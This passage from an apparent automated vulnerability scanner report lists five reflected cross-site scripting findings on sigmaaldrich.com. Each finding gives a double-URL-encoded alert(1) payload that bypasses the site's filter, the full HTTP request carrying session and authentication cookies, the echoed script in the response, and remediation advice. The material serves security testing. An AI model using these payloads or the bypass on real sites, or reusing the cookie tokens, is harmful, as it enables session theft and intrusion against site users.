bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content83a71";alert(1)//4e9b2e06d4b/sigma-aldrich/customer-support/customer-service/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.199. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d79c5%2522%253balert%25281%2529%252f%252f0527dafe1d was submitted in the REST URL parameter 2. This input was echoed as d79c5";alert(1)//0527dafe1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd79c5%2522%253balert%25281%2529%252f%252f0527dafe1d/customer-support/customer-service/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd79c5";alert(1)//0527dafe1d/customer-support/customer-service/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.200. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 600d9%2522%253balert%25281%2529%252f%252fc38a9c4497e was submitted in the REST URL parameter 3. This input was echoed as 600d9";alert(1)//c38a9c4497e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support600d9%2522%253balert%25281%2529%252f%252fc38a9c4497e/customer-service/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support600d9";alert(1)//c38a9c4497e/customer-service/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.201. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12900%2522%253balert%25281%2529%252f%252f47c04f4e82c was submitted in the REST URL parameter 4. This input was echoed as 12900";alert(1)//47c04f4e82c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service12900%2522%253balert%25281%2529%252f%252f47c04f4e82c/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service12900";alert(1)//47c04f4e82c/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.202. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40771%2522%253balert%25281%2529%252f%252f543c7fd8ffa was submitted in the REST URL parameter 5. This input was echoed as 40771";alert(1)//543c7fd8ffa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services40771%2522%253balert%25281%2529%252f%252f543c7fd8ffa/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services40771";alert(1)//543c7fd8ffa/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.203. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f46%2522%253balert%25281%2529%252f%252f7070efac145 was submitted in the REST URL parameter 6. This input was echoed as 82f46";alert(1)//7070efac145 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop82f46%2522%253balert%25281%2529%252f%252f7070efac145 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

